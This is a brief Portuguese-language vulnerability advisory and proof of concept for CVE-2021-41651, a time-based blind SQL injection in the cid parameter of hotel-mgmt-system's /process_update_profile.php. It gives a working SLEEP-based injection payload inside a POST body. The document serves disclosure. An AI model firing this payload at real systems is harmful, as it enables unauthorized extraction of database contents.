
Prova de conceito para CVE-2021-41651, demonstrando injeção SQL cega baseada em tempo não autenticada no hotel-mgmt-system através do parâmetro cid, permitindo extração de dados sensíveis do MySQL.
CVE-2021-41651 Injeção SQL no hotel-mgmt-system
O hotel-mgmt-system é vulnerável a ataques de injeção SQL cega baseada em tempo não autenticados.
O parâmetro cid na página /process_update_profile.php não sanitiza a entrada do usuário, um atacante pode extrair dados sensíveis do banco de dados MySQL subjacente.
URL: /process_update_profile.php
PARÂMETRO: cid
Parâmetro: cid ((custom) POST)
Tipo: cego baseado em tempo
Título: MySQL >= 5.0.12 AND cego baseado em tempo (query SLEEP)
Payload: phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&[email protected]&newPassword=fasdfasdfasdfasdfasdf-

Jason Colyvas
MOBIUSBINARY
23 de setembro de 2021